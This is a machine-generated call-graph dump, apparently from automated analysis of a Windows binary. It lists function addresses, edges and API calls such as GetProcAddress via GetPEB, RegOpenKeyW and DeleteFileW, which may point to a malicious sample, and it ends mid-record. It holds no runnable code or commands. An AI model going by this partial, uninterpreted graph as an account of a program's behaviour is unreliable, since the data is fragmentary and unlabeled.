8332->8329 8334 409092 8333->8334 8344 409408 8333->8344 8336 4090a3 8334->8336 8339 402bab 2 API calls 8334->8339 8338 402bab 2 API calls 8338->8334 8339->8336 8341 413b31 8340->8341 8342 413b38 8340->8342 8343 404056 6 API calls 8341->8343 8342->8330 8343->8342 8345 409413 8344->8345 8346 40908c 8345->8346 8358 409d36 8345->8358 8346->8338 8357 40945c 8464 40a35d 8357->8464 8359 409d43 8358->8359 8360 40a35d 4 API calls 8359->8360 8361 409d55 8360->8361 8362 4031e5 4 API calls 8361->8362 8363 409d8b 8362->8363 8364 4031e5 4 API calls 8363->8364 8365 409dd0 8364->8365 8366 405b6f 6 API calls 8365->8366 8397 409423 8365->8397 8368 409df7 8366->8368 8367 409e1c 8369 4031e5 4 API calls 8367->8369 8367->8397 8368->8367 8371 402bab 2 API calls 8368->8371 8370 409e62 8369->8370 8372 4031e5 4 API calls 8370->8372 8371->8367 8373 409e82 8372->8373 8374 4031e5 4 API calls 8373->8374 8375 409ea2 8374->8375 8376 4031e5 4 API calls 8375->8376 8377 409ec2 8376->8377 8378 4031e5 4 API calls 8377->8378 8379 409ee2 8378->8379 8380 4031e5 4 API calls 8379->8380 8381 409f02 8380->8381 8382 4031e5 4 API calls 8381->8382 8383 409f22 8382->8383 8384 4031e5 4 API calls 8383->8384 8387 409f42 8384->8387 8385 40a19b 8386 408b2c 4 API calls 8385->8386 8386->8397 8387->8385 8388 409fa3 8387->8388 8389 405b6f 6 API calls 8388->8389 8388->8397 8390 409fbd 8389->8390 8391 40a02c 8390->8391 8393 402bab 2 API calls 8390->8393 8392 4031e5 4 API calls 8391->8392 8419 40a16d 8391->8419 8394 40a070 8392->8394 8396 409fd7 8393->8396 8399 4031e5 4 API calls 8394->8399 8395 402bab 2 API calls 8395->8397 8398 405b6f 6 API calls 8396->8398 8397->8357 8420 4056bf 8397->8420 8401 409fe5 8398->8401 8400 40a090 8399->8400 8403 4031e5 4 API calls 8400->8403 8401->8391 8402 402bab 2 API calls 8401->8402 8404 409fff 8402->8404 8405 40a0b0 8403->8405 8406 405b6f 6 API calls 8404->8406 8408 4031e5 4 API calls 8405->8408 8407 40a00d 8406->8407 8407->8391 8410 40a021 8407->8410 8409 40a0d0 8408->8409 8411 4031e5 4 API calls 8409->8411 8412 402bab 2 API calls 8410->8412 8413 40a0f0 8411->8413 8412->8397 8414 4031e5 4 API calls 8413->8414 8415 40a110 8414->8415 8416 40a134 8415->8416 8417 4031e5 4 API calls 8415->8417 8416->8419 8474 408b2c 8416->8474 8417->8416 8419->8395 8419->8397 8421 402b7c 2 API calls 8420->8421 8423 4056cd 8421->8423 8422 4056d4 8425 408c4d 8422->8425 8423->8422 8424 402b7c 2 API calls 8423->8424 8424->8422 8426 413ba4 6 API calls 8425->8426 8427 408c5c 8426->8427 8428 408f02 8427->8428 8429 408f3a 8427->8429 8432 40903e 8427->8432 8431 405b6f 6 API calls 8428->8431 8430 405b6f 6 API calls 8429->8430 8446 408f51 8430->8446 8433 408f0c 8431->8433 8448 413aca 8432->8448 8433->8432 8437 408f31 8433->8437 8477 40a1b6 8433->8477 8435 405b6f 6 API calls 8435->8446 8436 402bab 2 API calls 8436->8432 8437->8436 8439 409031 8440 402bab 2 API calls 8439->8440 8440->8437 8441 409022 8442 402bab 2 API calls 8441->8442 8443 409028 8442->8443 8444 402bab 2 API calls 8443->8444 8444->8437 8445 402bab GetProcessHeap HeapFree 8445->8446 8446->8432 8446->8435 8446->8437 8446->8439 8446->8441 8446->8445 8447 40a1b6 14 API calls 8446->8447 8511 4044ee 8446->8511 8447->8446 8449 413ad7 8448->8449 8457 409451 8448->8457 8450 405781 4 API calls 8449->8450 8451 413af0 8450->8451 8452 405781 4 API calls 8451->8452 8453 413afe 8452->8453 8454 405762 4 API calls 8453->8454 8455 413b0e 8454->8455 8456 405781 4 API calls 8455->8456 8455->8457 8456->8457 8458 405695 8457->8458 8459 4056a0 8458->8459 8463 4056b9 8458->8463 8460 402bab 2 API calls 8459->8460 8461 4056b3 8460->8461 8462 402bab 2 API calls 8461->8462 8462->8463 8463->8357 8465 40a368 8464->8465 8466 40a39a 8464->8466 8470 4031e5 4 API calls 8465->8470 8467 40a3af 8466->8467 8468 4031e5 4 API calls 8466->8468 8469 40a3ca 8467->8469 8471 408b2c 4 API calls 8467->8471 8468->8467 8472 408b2c 4 API calls 8469->8472 8473 40a38a 8469->8473 8470->8473 8471->8469 8472->8473 8473->8346 8475 4031e5 4 API calls 8474->8475 8476 408b3e 8475->8476 8476->8419 8478 40a202 8477->8478 8479 40a1c3 8477->8479 8633 405f08 8478->8633 8480 405b6f 6 API calls 8479->8480 8483 40a1d0 8480->8483 8482 40a1fc 8482->8437 8483->8482 8485 40a1f3 8483->8485 8521 40a45b 8483->8521 8488 402bab 2 API calls 8485->8488 8486 402bab 2 API calls 8486->8482 8488->8482 8489 405b6f 6 API calls 8491 40a245 8489->8491 8490 40a25d 8492 405b6f 6 API calls 8490->8492 8491->8490 8493 413a58 13 API calls 8491->8493 8498 40a26b 8492->8498 8495 40a257 8493->8495 8494 40a28b 8496 405b6f 6 API calls 8494->8496 8497 402bab 2 API calls 8495->8497 8499 40a297 8496->8499 8497->8490 8498->8494 8500 40a284 8498->8500 8640 40955b 8498->8640 8504 40a2b0 8499->8504 8508 40a2b7 8499->8508 8647 40968e 8499->8647 8502 402bab 2 API calls 8500->8502 8502->8494 8503 405b6f 6 API calls 8503->8508 8506 402bab 2 API calls 8504->8506 8506->8508 8507 40a333 8507->8486 8508->8503 8508->8507 8509 402bab 2 API calls 8508->8509 8657 4098a7 8508->8657 8509->8508 8512 402b7c 2 API calls 8511->8512 8513 404512 8512->8513 8515 404585 GetLastError 8513->8515 8517 402bab 2 API calls 8513->8517 8519 40457c 8513->8519 8520 402b7c 2 API calls 8513->8520 8912 4044a7 8513->8912 8516 404592 8515->8516 8515->8519 8518 402bab 2 API calls 8516->8518 8517->8513 8518->8519 8519->8446 8520->8513 8666 40642c 8521->8666 8523 40a469 8524 40c4ff 8523->8524 8669 4047e6 8523->8669 8524->8485 8527 4040bb 12 API calls 8528 40bf88 8527->8528 8528->8524 8529 403c90 8 API calls 8528->8529 8530 40bfaa 8529->8530 8531 402b7c 2 API calls 8530->8531 8533 40bfc1 8531->8533 8532 40c4f3 8534 403f9e 5 API calls 8532->8534 8535 40c3aa 8533->8535 8676 40a423 8533->8676 8534->8524 8535->8532 8538 4056bf 2 API calls 8535->8538 8541 40c4e3 8535->8541 8536 402bab 2 API calls 8536->8532 8540 40c3d2 8538->8540 8540->8541 8543 4040bb 12 API calls 8540->8543 8541->8536 8542 405f08 4 API calls 8544 40c005 8542->8544 8545 40c3f3 8543->8545 8546 40c021 8544->8546 8679 40a43f 8544->8679 8548 40c4d1 8545->8548 8736 405a52 8545->8736 8547 4031e5 4 API calls 8546->8547 8550 40c034 8547->8550 8553 413aca 4 API calls 8548->8553 8559 4031e5 4 API calls 8550->8559 8554 40c4dd 8553->8554 8557 405695 2 API calls 8554->8557 8555 40c411 8741 405a87 8555->8741 8556 402bab 2 API calls 8556->8546 8557->8541 8565 40c04d 8559->8565 8560 40c4b3 8561 402bab 2 API calls 8560->8561 8563 40c4cb 8561->8563 8562 405a52 4 API calls 8573 40c423 8562->8573 8564 403f9e 5 API calls 8563->8564 8564->8548 8567 4031e5 4 API calls 8565->8567 8566 405a87 4 API calls 8566->8573 8568 40c085 8567->8568 8570 4031e5 4 API calls 8568->8570 8569 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8569->8573 8571 40c09c 8570->8571 8574 4031e5 4 API calls 8571->8574 8572 402bab 2 API calls 8572->8573 8573->8560 8573->8562 8573->8566 8573->8569 8573->8572 8575 40c0b3 8574->8575 8576 4031e5 4 API calls 8575->8576 8577 40c0ca 8576->8577 8578 4031e5 4 API calls 8577->8578 8579 40c0e7 8578->8579 8580 4031e5 4 API calls 8579->8580 8581 40c100 8580->8581 8582 4031e5 4 API calls 8581->8582 8583 40c119 8582->8583 8584 4031e5 4 API calls 8583->8584 8585 40c132 8584->8585 8586 4031e5 4 API calls 8585->8586 8587 40c14b 8586->8587 8588 4031e5 4 API calls 8587->8588 8589 40c164 8588->8589 8590 4031e5 4 API calls 8589->8590 8591 40c17d 8590->8591 8592 4031e5 4 API calls 8591->8592 8593 40c196 8592->8593 8594 4031e5 4 API calls 8593->8594 8595 40c1af 8594->8595 8596 4031e5 4 API calls 8595->8596 8597 40c1c8 8596->8597 8598 4031e5 4 API calls 8597->8598 8599 40c1de 8598->8599 8600 4031e5 4 API calls 8599->8600 8601 40c1f4 8600->8601 8602 4031e5 4 API calls 8601->8602 8603 40c20d 8602->8603 8604 4031e5 4 API calls 8603->8604 8605 40c226 8604->8605 8606 4031e5 4 API calls 8605->8606 8607 40c23f 8606->8607 8608 4031e5 4 API calls 8607->8608 8609 40c258 8608->8609 8610 4031e5 4 API calls 8609->8610 8611 40c273 8610->8611 8612 4031e5 4 API calls 8611->8612 8613 40c28a 8612->8613 8614 4031e5 4 API calls 8613->8614 8617 40c2d5 8614->8617 8615 40c3a2 8616 402bab 2 API calls 8615->8616 8616->8535 8617->8615 8618 4031e5 4 API calls 8617->8618 8619 40c315 8618->8619 8620 40c38b 8619->8620 8682 404866 8619->8682 8621 403c40 5 API calls 8620->8621 8623 40c397 8621->8623 8625 403c40 5 API calls 8623->8625 8625->8615 8626 40c382 8628 403c40 5 API calls 8626->8628 8628->8620 8630 406c4c 6 API calls 8631 40c355 8630->8631 8631->8626 8706 4126a7 8631->8706 8634 4031e5 4 API calls 8633->8634 8635 405f1d 8634->8635 8636 405f55 8635->8636 8637 402b7c 2 API calls 8635->8637 8636->8482 8636->8489 8636->8490 8636->8507 8638 405f36 8637->8638 8638->8636 8639 4031e5 4 API calls 8638->8639 8639->8636 8641 409673 8640->8641 8646 40956d 8640->8646 8641->8500 8642 408b45 6 API calls 8642->8646 8643 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8643->8646 8644 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8644->8646 8645 402bab GetProcessHeap HeapFree 8645->8646 8646->8641 8646->8642 8646->8643 8646->8644 8646->8645 8648 4040bb 12 API calls 8647->8648 8652 4096a9 8648->8652 8649 40989f 8649->8504 8650 409896 8651 403f9e 5 API calls 8650->8651 8651->8649 8652->8649 8652->8650 8654 408b45 6 API calls 8652->8654 8655 402bab GetProcessHeap HeapFree 8652->8655 8656 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8652->8656 8905 4059d8 8652->8905 8654->8652 8655->8652 8656->8652 8658 4040bb 12 API calls 8657->8658 8664 4098c1 8658->8664 8659 4099fb 8659->8508 8660 4099f3 8661 403f9e 5 API calls 8660->8661 8661->8659 8662 4059d8 4 API calls 8662->8664 8663 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8663->8664 8664->8659 8664->8660 8664->8662 8664->8663 8665 402bab GetProcessHeap HeapFree 8664->8665 8665->8664 8667 4031e5 4 API calls 8666->8667 8668 406441 GetNativeSystemInfo 8667->8668 8668->8523 8670 4031e5 4 API calls 8669->8670 8672 40480a 8670->8672 8671 4031e5 4 API calls 8671->8672 8672->8671 8674 40484f 8672->8674 8675 40485d 8672->8675 8673 403c40 5 API calls 8673->8675 8674->8673 8675->8524 8675->8527 8677 4031e5 4 API calls 8676->8677 8678 40a435 8677->8678 8678->8542 8680 4031e5 4 API calls 8679->8680 8681 40a451 8680->8681 8681->8556 8683 4031e5 4 API calls 8682->8683 8684 40487c 8683->8684 8684->8626 8685 406c4c 8684->8685 8746 4068eb 8685->8746 8687 406e02 8687->8630 8688 406cab 8758 40469b 8688->8758 8689 406c6c 8689->8687 8689->8688 8755 406894 8689->8755 8696 406df1 8697 40469b 4 API calls 8696->8697 8697->8687 8698 406cef 8698->8696 8699 4031e5 4 API calls 8698->8699 8700 406d26 8699->8700 8700->8696 8701 40771e 6 API calls 8700->8701 8705 406d57 8701->8705 8702 406da2 8703 4031e5 4 API calls 8702->8703 8703->8696 8705->8702 8771 4068b0 8705->8771 8707 4126bb 8706->8707 8708 4126d1 8706->8708 8709 412840 8707->8709 8827 40488c 8707->8827 8708->8709 8833 407055 8708->8833 8709->8626 8713 412837 8714 403c40 5 API calls 8713->8714 8714->8709 8717 41281e 8718 4070ff 6 API calls 8717->8718 8718->8713 8719 407055 6 API calls 8720 412742 8719->8720 8720->8717 8721 40719a 6 API calls 8720->8721 8722 41276e 8721->8722 8735 412804 8722->8735 8849 406f4a 8722->8849 8725 41279a 8855 412553 8725->8855 8877 4070ff 8735->8877 8899 405907 8736->8899 8738 405a61 8739 405a76 8738->8739 8740 405907 4 API calls 8738->8740 8739->8555 8740->8738 8742 402b7c 2 API calls 8741->8742 8745 405a99 8742->8745 8743 405ade 8743->8573 8745->8743 8902 40595e 8745->8902 8774 4076a8 8746->8774 8748 406913 8749 406a61 8748->8749 8750 40771e 6 API calls 8748->8750 8749->8689 8754 406949 8750->8754 8751 40771e 6 API calls 8751->8754 8753 404678 4 API calls 8753->8754 8754->8749 8754->8751 8754->8753 8780 4046c2 8754->8780 8756 4031e5 4 API calls 8755->8756 8757 4068a6 8756->8757 8757->8689 8759 4046b4 8758->8759 8760 4046a4 8758->8760 8759->8687 8762 404678 8759->8762 8761 4031e5 4 API calls 8760->8761 8761->8759 8763 4031e5 4 API calls 8762->8763 8764 40468b 8763->8764 8764->8687 8765 40771e 8764->8765 8766 407737 8765->8766 8770 407748 8765->8770 8767 407644 6 API calls 8766->8767 8768 407741 8767->8768 8769 406baa 6 API calls 8768->8769 8769->8770 8770->8698 8772 4031e5 4 API calls 8771->8772 8773 4068c2 8772->8773 8773->8705 8775 4076c1 8774->8775 8779 4076d2 8774->8779 8788 407644 8775->8788 8779->8748 8781 4046d3 8780->8781 8782 4046d9 8780->8782 8823 40464c 8781->8823 8784 4046e9 8782->8784 8786 404678 4 API calls 8782->8786 8785 404714 8784->8785 8787 40469b 4 API calls 8784->8787 8785->8754 8786->8784 8787->8785 8789 407653 8788->8789 8790 407661 8788->8790 8789->8790 8796 406a6b 8789->8796 8792 406baa 8790->8792 8793 406bbb 8792->8793 8795 406bc8 8792->8795 8793->8795 8804 407402 8793->8804 8795->8779 8800 406a81 8796->8800 8797 402b7c 2 API calls 8797->8800 8798 406b8b 8798->8790 8799 406894 4 API calls 8799->8800 8800->8797 8800->8798 8800->8799 8801 406b96 8800->8801 8802 402bab 2 API calls 8800->8802 8803 402bab 2 API calls 8801->8803 8802->8800 8803->8798 8805 407644 6 API calls 8804->8805 8806 407412 8805->8806 8807 402b7c 2 API calls 8806->8807 8814 407450 8806->8814 8808 407483 8807->8808 8809 402b7c 2 API calls 8808->8809 8808->8814 8812 4074ce 8809->8812 8810 4074da 8811 4068cc 2 API calls 8810->8811 8811->8814 8812->8810 8813 402b7c 2 API calls 8812->8813 8817 40751f 8813->8817 8814->8795 8815 40752b 8816 4068cc 2 API calls 8815->8816 8816->8810 8817->8815 8819 4068cc 8817->8819 8820 4068d6 8819->8820 8821 4068e3 8819->8821 8820->8821 8822 402bab GetProcessHeap HeapFree 8820->8822 8821->8815 8822->8821 8824 404666 8823->8824 8825 404659 8823->8825 8824->8782 8826 4031e5 4 API calls 8825->8826 8826->8824 8828 4047e6 5 API calls 8827->8828 8829 404897 8828->8829 8830 40489c 8829->8830 8885 4047c7 8829->8885 8830->8708 8834 40706f 8833->8834 8835 407084 8833->8835 8834->8835 8836 407644 6 API calls 8834->8836 8840 4070e4 8835->8840 8888 406fd2 8835->8888 8837 40707d 8836->8837 8839 406baa 6 API calls 8837->8839 8839->8835 8840->8713 8841 40719a 8840->8841 8842 4071b0 8841->8842 8844 4071c5 8841->8844 8843 407644 6 API calls 8842->8843 8842->8844 8845 4071be 8843->8845 8847 406fd2 4 API calls 8844->8847 8848 407226 8844->8848 8846 406baa 6 API calls 8845->8846 8846->8844 8847->8848 8848->8717 8848->8719 8850 406f64 8849->8850 8853 406f75 8849->8853 8851 407644 6 API calls 8850->8851 8852 406f6e 8851->8852 8854 406baa 6 API calls 8852->8854 8853->8725 8854->8853 8896 4060ac 8855->8896 8878 407116 8877->8878 8879 40712b 8877->8879 8878->8879 8880 407644 6 API calls 8878->8880 8883 407187 8879->8883 8884 406fd2 4 API calls 8879->8884 8881 407124 8880->8881 8882 406baa 6 API calls 8881->8882 8882->8879 8883->8717 8884->8883 8886 4031e5 4 API calls 8885->8886 8887 4047d9 8886->8887 8887->8708 8889 406fde 8888->8889 8890 407027 8889->8890 8891 4031e5 4 API calls 8889->8891 8890->8840 8892 406ffa 8891->8892 8893 4031e5 4 API calls 8892->8893 8894 407011 8893->8894 8895 4031e5 4 API calls 8894->8895 8895->8890 8897 4031e5 4 API calls 8896->8897 8898 4060bb 8897->8898 8898->8898 8900 4031e5 4 API calls 8899->8900 8901 40591a 8900->8901 8901->8738 8903 4031e5 4 API calls 8902->8903 8904 405971 8903->8904 8904->8745 8906 4031e5 4 API calls 8905->8906 8907 4059ed 8906->8907 8908 405a38 8907->8908 8909 402b7c 2 API calls 8907->8909 8908->8652 8910 405a16 8909->8910 8910->8908 8911 4031e5 4 API calls 8910->8911 8911->8908 8913 4031e5 4 API calls 8912->8913 8914 4044b9 8913->8914 8914->8513 9834 40a349 9835 4098a7 13 API calls 9834->9835 9836 40a359 9835->9836 9073 408952 9094 40823f 9073->9094 9076 408960 9078 4056bf 2 API calls 9076->9078 9079 40896a 9078->9079 9122 408862 9079->9122 9081 413aca 4 API calls 9082 4089d4 9081->9082 9084 405695 2 API calls 9082->9084 9083 408975 9091 4089c4 9083->9091 9130 4087d6 9083->9130 9086 4089df 9084->9086 9091->9081 9092 402bab 2 API calls 9093 40899d 9092->9093 9093->9091 9093->9092 9095 40824d 9094->9095 9096 40831b 9095->9096 9097 4031e5 4 API calls 9095->9097 9096->9076 9110 4083bb 9096->9110 9098 40826d 9097->9098 9099 4031e5 4 API calls 9098->9099 9100 408289 9099->9100 9101 4031e5 4 API calls 9100->9101 9102 4082a5 9101->9102 9103 4031e5 4 API calls 9102->9103 9104 4082c1 9103->9104 9105 4031e5 4 API calls 9104->9105 9106 4082e2 9105->9106 9107 4031e5 4 API calls 9106->9107 9108 4082ff 9107->9108 9109 4031e5 4 API calls 9108->9109 9109->9096 9158 408363 9110->9158 9113 4084ab 9113->9076 9114 4056bf 2 API calls 9119 4083f4 9114->9119 9115 408492 9116 413aca 4 API calls 9115->9116 9117 4084a0 9116->9117 9118 405695 2 API calls 9117->9118 9118->9113 9119->9115 9161 40815d 9119->9161 9176 40805d 9119->9176 9191 404b8f 9122->9191 9124 408946 9124->9083 9125 40887e 9125->9124 9126 4031e5 4 API calls 9125->9126 9127 40893e 9125->9127 9129 402b7c 2 API calls 9125->9129 9126->9125 9194 404a39 9127->9194 9129->9125 9131 402b7c 2 API calls 9130->9131 9132 4087e7 9131->9132 9133 40885a 9132->9133 9134 4031e5 4 API calls 9132->9134 9142 408749 9133->9142 9135 408802 9134->9135 9138 40884d 9135->9138 9141 408853 9135->9141 9203 408522 9135->9203 9207 4084b4 9135->9207 9136 402bab 2 API calls 9136->9133 9210 4084d4 9138->9210 9141->9136 9143 404b8f 5 API calls 9142->9143 9145 408765 9143->9145 9144 4031e5 4 API calls 9144->9145 9145->9144 9146 408522 4 API calls 9145->9146 9147 4087c7 9145->9147 9149 4087cf 9145->9149 9146->9145 9148 404a39 5 API calls 9147->9148 9148->9149 9150 4085d1 9149->9150 9152 4086c2 9150->9152 9156 4085e9 9150->9156 9152->9093 9153 402bab 2 API calls 9153->9156 9154 4031e5 4 API calls 9154->9156 9156->9152 9156->9153 9156->9154 9216 4089e6 9156->9216 9235 4086c9 9156->9235 9239 4036a3 9156->9239 9159 4031e5 4 API calls 9158->9159 9160 408386 9159->9160 9160->9113 9160->9114 9162 40816f 9161->9162 9163 4081b6 9162->9163 9164 4081fd 9162->9164 9175 4081ef 9162->9175 9165 405872 4 API calls 9163->9165 9166 405872 4 API calls 9164->9166 9167 4081cf 9165->9167 9168 408213 9166->9168 9169 405872 4 API calls 9167->9169 9170 405872 4 API calls 9168->9170 9171 4081df 9169->9171 9172 408222 9170->9172 9173 405872 4 API calls 9171->9173 9174 405872 4 API calls 9172->9174 9173->9175 9174->9175 9175->9119 9177 40808c 9176->9177 9178 4080d2 9177->9178 9179 408119 9177->9179 9190 40810b 9177->9190 9181 405872 4 API calls 9178->9181 9180 405872 4 API calls 9179->9180 9182 40812f 9180->9182 9183 4080eb 9181->9183 9185 405872 4 API calls 9182->9185 9184 405872 4 API calls 9183->9184 9186 4080fb 9184->9186 9187 40813e 9185->9187 9188 405872 4 API calls 9186->9188 9189 405872 4 API calls 9187->9189 9188->9190 9189->9190 9190->9119 9197 404a19 9191->9197 9193 404ba0 9193->9125 9200 4049ff 9194->9200 9196 404a44 9196->9124 9198 4031e5 4 API calls 9197->9198 9199 404a2c RegOpenKeyW 9198->9199 9199->9193 9201 4031e5 4 API calls 9200->9201 9202 404a12 RegCloseKey 9201->9202 9202->9196 9205 408534 9203->9205 9204 4085af 9204->9135 9205->9204 9213 4084ee 9205->9213 9208 4031e5 4 API calls 9207->9208 9209 4084c7 9208->9209 9209->9135 9211 4031e5 4 API calls 9210->9211 9212 4084e7 9211->9212 9212->9141 9214 4031e5 4 API calls 9213->9214 9215 408501 9214->9215 9215->9204 9217 4031e5 4 API calls 9216->9217 9218 408a06 9217->9218 9219 408b21 9218->9219 9220 4031e5 4 API calls 9218->9220 9219->9156 9222 408a32 9220->9222 9228 408b17 9222->9228 9242 403666 9222->9242 9225 408b0e 9248 40362f 9225->9248 9226 4031e5 4 API calls 9229 408a88 9226->9229 9251 403649 9228->9251 9229->9225 9230 4031e5 4 API calls 9229->9230 9231 408ac4 9230->9231 9232 405b6f 6 API calls 9231->9232 9233 408aff 9232->9233 9233->9225 9245 408508 9233->9245 9236 4086e2 9235->9236 9237 408744 9235->9237 9236->9237 9238 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9236->9238 9237->9156 9238->9236 9240 4031e5 4 API calls 9239->9240 9241 4036b5 9240->9241 9241->9156 9243 4031e5 4 API calls 9242->9243 9244 403679 9243->9244 9244->9225 9244->9226 9246 4031e5 4 API calls 9245->9246 9247 40851b 9246->9247 9247->9225 9249 4031e5 4 API calls 9248->9249 9250 403642 9249->9250 9250->9228 9252 4031e5 4 API calls 9251->9252 9253 40365c 9252->9253 9253->9219 9854 40f252 9855 404bee 6 API calls 9854->9855 9856 40f269 9855->9856 9857 404bee 6 API calls 9856->9857 9863 40f2ff 9856->9863 9858 40f282 9857->9858 9859 404bee 6 API calls 9858->9859 9860 40f290 9859->9860 9871 404c4e 9860->9871 9862 40f2a7 9862->9863 9864 405872 4 API calls 9862->9864 9865 40f2cd 9864->9865 9866 405872 4 API calls 9865->9866 9867 40f2dc 9866->9867 9868 405872 4 API calls 9867->9868 9869 40f2ee 9868->9869 9870 405762 4 API calls 9869->9870 9870->9863 9872 402b7c 2 API calls 9871->9872 9874 404c60 9872->9874 9873 404ca4 9873->9862 9874->9873 9875 4031e5 4 API calls 9874->9875 9876 404c8d 9875->9876 9876->9873 9877 402bab 2 API calls 9876->9877 9877->9873 9878 41045c 9879 4040bb 12 API calls 9878->9879 9880 410477 9879->9880 9881 41060b 9880->9881 9909 407851 9880->9909 9883 41048f 9885 407851 2 API calls 9883->9885 9889 410604 9883->9889 9884 403f9e 5 API calls 9884->9881 9886 4104a9 9885->9886 9891 4105e0 9886->9891 9892 405ae9 6 API calls 9886->9892 9894 41056f 9886->9894 9895 4105eb 9886->9895 9887 402bab 2 API calls 9887->9889 9888 402bab 2 API calls 9890 4105fb 9888->9890 9889->9884 9890->9887 9893 402bab 2 API calls 9891->9893 9891->9895 9892->9886 9893->9895 9894->9891 9896 4105d6 9894->9896 9898 412269 6 API calls 9894->9898 9895->9888 9895->9890 9897 402bab 2 API calls 9896->9897 9897->9891 9899 410580 9898->9899 9899->9896 9900 405872 4 API calls 9899->9900 9901 410599 9900->9901 9902 405872 4 API calls 9901->9902 9903 4105a9 9902->9903 9904 405872 4 API calls 9903->9904 9905 4105bb 9904->9905 9906 405872 4 API calls 9905->9906 9907 4105cd 9906->9907 9908 402bab 2 API calls 9907->9908 9908->9896 9910 407866 9909->9910 9911 402b7c 2 API calls 9910->9911 9912 407899 9910->9912 9911->9912 9912->9883 9315 40f561 9318 40f4b6 9315->9318 9319 413b28 6 API calls 9318->9319 9324 40f4bf 9319->9324 9320 40f559 9321 405b6f 6 API calls 9321->9324 9322 402bab GetProcessHeap HeapFree 9322->9324 9323 413a58 13 API calls 9323->9324 9324->9320 9324->9321 9324->9322 9324->9323 9328 403b64 9329 4031e5 4 API calls 9328->9329 9330 403b77 PathFileExistsW 9329->9330 9944 40d069 9945 404bee 6 API calls 9944->9945 9946 40d080 9945->9946 9947 404bee 6 API calls 9946->9947 9968 40d1e2 9946->9968 9948 40d099 9947->9948 9949 404bee 6 API calls 9948->9949 9950 40d0a7 9949->9950 9985 404ba7 9950->9985 9953 404bee 6 API calls 9954 40d0c5 9953->9954 9955 404c4e 6 API calls 9954->9955 9956 40d0dc 9955->9956 9957 404bee 6 API calls 9956->9957 9958 40d0eb 9957->9958 9959 404ba7 4 API calls 9958->9959 9960 40d0fa 9959->9960 9961 404bee 6 API calls 9960->9961 9962 40d109 9961->9962 9963 404c4e 6 API calls 9962->9963 9964 40d123 9963->9964 9965 405872 4 API calls 9964->9965 9964->9968 9966 40d14a 9965->9966 9967 405872 4 API calls 9966->9967 9969 40d159 9967->9969 9970 405872 4 API calls 9969->9970 9971 40d16b 9970->9971 9972 405781 4 API calls 9971->9972 9973 40d179 9972->9973 9974 405872 4 API calls 9973->9974 9975 40d18b 9974->9975 9976 405762 4 API calls 9975->9976 9977 40d19f 9976->9977 9978 405872 4 API calls 9977->9978 9979 40d1b1 9978->9979 9980 405781 4 API calls 9979->9980 9981 40d1bf 9980->9981 9982 405872 4 API calls 9981->9982 9983 40d1d1 9982->9983 9984 405762 4 API calls 9983->9984 9984->9968 9986 4031e5 4 API calls 9985->9986 9987 404bca 9986->9987 9987->9953 9357 40f16e 9358 4056bf 2 API calls 9357->9358 9359 40f17b 9358->9359 9360 412093 20 API calls 9359->9360 9361 40f19e 9360->9361 9362 412093 20 API calls 9361->9362 9363 40f1b6 9362->9363 9364 412093 20 API calls 9363->9364 9365 40f1cc 9364->9365 9366 412093 20 API calls 9365->9366 9367 40f1e2 9366->9367 9368 413aca 4 API calls 9367->9368 9369 40f1ef 9368->9369 9370 405695 2 API calls 9369->9370 9371 40f1fa 9370->9371 9372 40ce71 9373 413b28 6 API calls 9372->9373 9374 40ce78 9373->9374 9375 405b6f 6 API calls 9374->9375 9378 40ce83 9375->9378 9376 40cec1 9377 403fbf 7 API calls 9376->9377 9379 40cecc 9377->9379 9378->9376 9380 403d74 19 API calls 9378->9380 9390 40ceba 9378->9390 9382 403d74 19 API calls 9379->9382 9389 40cefb 9379->9389 9384 40cead 9380->9384 9381 402bab 2 API calls 9381->9376 9383 40cee7 9382->9383 9385 402bab 2 API calls 9383->9385 9388 40cef4 9383->9388 9387 402bab 2 API calls 9384->9387 9384->9390 9385->9388 9386 402bab 2 API calls 9386->9389 9387->9390 9388->9386 9390->9381 9391 406472 9392 4031e5 4 API calls 9391->9392 9393 406484 Sleep 9392->9393 10061 40f204 10062 405781 4 API calls 10061->10062 10063 40f214 10062->10063 10064 4057df 13 API calls 10063->10064 10065 40f226 10064->10065 9451 403c08 9452 4031e5 4 API calls 9451->9452 9453 403c1a DeleteFileW 9452->9453 9454 410a09 9455 41219c 14 API calls 9454->9455 9456 410a1b 9455->9456 9457 41219c 14 API calls 9456->9457 9458 410a23 9457->9458 9459 41219c 14 API calls 9458->9459 9460 410a2c 9459->9460 9461 41219c 14 API calls 9460->9461 9462 410a38 9461->9462 9463 404b22 6 API calls 9462->9463 9464 410a4c 9463->9464 9465 410a7a 9464->9465 9466 403fbf 7 API calls 9464->9466 9467 410a5c 9466->9467 9468 410a71 9467->9468 9469 413a58 13 API calls 9467->9469 9470 402bab 2 API calls 9468->9470 9471 410a6b 9469->9471 9470->9465 9472 402bab 2 API calls 9471->9472 9472->9468 10066 410d09 10067 410d56 10066->10067 10068 410d17 10066->10068 10070 413a58 13 API calls 10067->10070 10082 406642 10068->10082 10072 410d6f 10070->10072 10073 4056bf 2 API calls 10074 410d2e 10073->10074 10095 405641 10074->10095 10076 410d41 10077 413aca 4 API calls 10076->10077 10078 410d4a 10077->10078 10079 405695 2 API calls 10078->10079 10080 410d50 10079->10080 10081 4036a3 4 API calls 10080->10081 10081->10067 10083 406662 10082->10083 10084 4031e5 4 API calls 10083->10084 10085 406676 10084->10085 10099 4066bf 10085->10099 10090 4066b1 10092 4036a3 4 API calls 10090->10092 10091 4066a7 10093 4036a3 4 API calls 10091->10093 10094 4066ac 10092->10094 10093->10094 10094->10067 10094->10073 10096 40564d 10095->10096 10097 405673 10095->10097 10096->10097 10098 4056fc 4 API calls 10096->10098 10097->10076 10098->10097 10100 4031e5 4 API calls 10099->10100 10101 4066dc 10100->10101 10102 4066f6 SetLastError 10101->10102 10103 406708 GetLastError 10101->10103 10104 406693 10102->10104 10103->10104 10105 406713 10103->10105 10121 406455 10104->10121 10106 4031e5 4 API calls 10105->10106 10107 406725 10106->10107 10107->10104 10108 4031e5 4 API calls 10107->10108 10109 40673f 10108->10109 10110 406753 10109->10110 10111 406749 10109->10111 10112 4031e5 4 API calls 10110->10112 10113 4036a3 4 API calls 10111->10113 10114 406761 10112->10114 10113->10104 10115 40678a 10114->10115 10116 40677c 